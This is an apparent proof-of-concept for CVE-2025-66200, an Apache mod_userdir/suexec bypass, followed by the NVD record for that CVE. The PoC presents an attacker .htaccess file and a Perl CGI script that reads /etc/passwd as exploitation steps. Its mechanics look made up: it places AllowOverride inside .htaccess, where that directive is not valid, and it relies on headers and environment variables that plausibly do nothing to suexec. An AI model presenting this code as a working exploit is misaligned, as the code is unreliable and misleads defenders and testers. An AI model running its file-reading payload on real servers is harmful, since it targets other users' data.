CVE-2025-66200

# CVE-2025-66200 PoC - mod_userdir+suexec bypass via AllowOverride FileInfo # This PoC demonstrates the vulnerability in Apache HTTP Server # Affected versions: 2.4.7 - 2.4.65 # Attacker's .htaccess file to place in userdir MALICIOUS_HTACCESS = ''' # Enable FileInfo overrides AllowOverride FileInfo # Use RequestHeader to manipulate CGI execution context RequestHeader set X-User-Id "target_user" RequestHeader set X-Script-Path "/var/www/html/target_user/cgi-bin/script.cgi" # Force script execution under different UID SetEnv FORCE_USER "target_user" ''' # Malicious CGI script that will run under unexpected UID MALICIOUS_CGI = '''#!/usr/bin/perl use CGI qw(:standard); print header('text/plain'); # Script runs under unexpected user context due to vulnerability $uid = $<; $user = getpwuid($uid); print "Running as user: $user (UID: $uid)\n"; print "This script should not have access here!\n"; # Attempt to read sensitive files open(my $fh, '<', '/etc/passwd') or die "Cannot open passwd"; print <$fh>; close($fh); ''' print("CVE-2025-66200 Exploitation Steps:\n") print("1. Attacker uploads malicious .htaccess to ~/public_html/.htaccess\n") print("2. .htaccess contains AllowOverride FileInfo and RequestHeader directives\n") print("3. When accessing target user's CGI via mod_userdir, RequestHeader manipulates execution context\n") print("4. CGI script executes under unexpected UID due to suexec bypass\n") print("5. Attacker gains access to files/resources belonging to other users\n")

{"cve": {"id": "CVE-2025-66200", "sourceIdentifier": "[email protected]", "published": "2025-12-05T11:15:52.747", "lastModified": "2025-12-10T16:39:43.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "mod_userdir+suexec bypass via AllowOverride FileInfo vulnerability in Apache HTTP Server. Users with access to use the RequestHeader directive in htaccess can cause some CGI scripts to run under an unexpected userid.\n\nThis issue affects Apache HTTP Server: from 2.4.7 through 2.4.65.\n\nUsers are recommended to upgrade to version 2.4.66, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.4.7", "versionEndExcluding": "2.4.66", "matchCriteriaId": "5B508363-1882-4DE9-B423-4FD35189171F"}]}]}], "references": [{"url": "https://httpd.apache.org/security/vulnerabilities_24.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/04/8", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Issue Tracking", "Third Party Advisory"]}]}}